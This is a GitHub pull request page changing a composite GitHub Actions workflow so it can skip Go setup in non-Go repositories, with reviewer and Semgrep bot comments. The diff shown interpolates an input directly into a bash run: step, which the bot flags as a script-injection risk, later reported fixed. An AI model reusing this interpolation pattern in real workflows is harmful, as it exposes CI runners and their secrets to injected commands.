Skip to content

chore: Allow use of run-script-and-commit GitHub action from non-Go projects #4049

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
lantoli merged 4 commits into from
Jan 9, 2026
Merged

chore: Allow use of run-script-and-commit GitHub action from non-Go projects #4049

Changes from 3 commits
Commits
Show all changes
4 commits
Select commit Hold shift + click to select a range
14bb472
check if it's a Go project
lantoli Jan 9, 2026
f3f1e8e
common go.mod path
lantoli Jan 9, 2026
d8075e8
also have tags if the script needs it
lantoli Jan 9, 2026
778f89c
go-mod-path input
lantoli Jan 9, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
16 changes: 15 additions & 1 deletion .github/templates/run-script-and-commit/action.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -39,13 +39,27 @@ runs:
uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8
Copy link
Collaborator

@EspenAlbert EspenAlbert Jan 9, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

what repository is checked out here when this is called from a different repo?

Copy link
Member Author

@lantoli lantoli Jan 9, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

callee repo, for example cluster module repo

with:
fetch-depth: 0
fetch-tags: true
token: ${{ inputs.apix_bot_pat }}
ref: ${{ inputs.branch }}

- name: Check if Go project
id: check-go
shell: bash
run: |
GO_MOD_PATH="${{ inputs.repo-path }}go.mod"
echo "go_mod_path=$GO_MOD_PATH" >> $GITHUB_OUTPUT
if [ -f "$GO_MOD_PATH" ]; then
echo "is_go_project=true" >> $GITHUB_OUTPUT
else
echo "is_go_project=false" >> $GITHUB_OUTPUT
fi

Copy link

@semgrep-code-mongodb semgrep-code-mongodb bot Jan 9, 2026
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Using variable interpolation ${{...}} with github context data in a run: step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. github context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with env: to store the data and use the environment variable in the run: script. Be sure to use double-quotes the environment variable, like this: "$ENVVAR".

🚀 Fixed in commit 778f89c 🚀

Copy link
Member Author

@lantoli lantoli Jan 9, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

/fp no security issue as this code is equivalent to the previous code and we control what paths we pass

Copy link
Collaborator

@maastha maastha Jan 9, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

it may help to pass this as an env var or atleast validate via regex that repo-path can only be a path-like string

Copy link
Member Author

@lantoli lantoli Jan 9, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@maastha cc @manupedrozo @EspenAlbert at the end I've changed repo-path to go-mod-path as it's only used for that, changed here: 778f89c

and adapted CFN repo which is the only one using it: mongodb/mongodbatlas-cloudformation-resources#1526

- name: Set up Go
if: steps.check-go.outputs.is_go_project == 'true'
uses: actions/setup-go@4dc6199c7b1a012772edbd06daecab0f50c9053c
with:
go-version-file: ${{ format('{0}go.mod', inputs.repo-path) }}
go-version-file: ${{ steps.check-go.outputs.go_mod_path }}
Copy link
Collaborator

@manupedrozo manupedrozo Jan 9, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
go-version-file: ${{ steps.check-go.outputs.go_mod_path }}
go-version-file: ${{ steps.check-go.outputs.go_mod_path }}

- name: Run specified script
shell: bash
run: ${{ inputs.script_call }}
Expand Down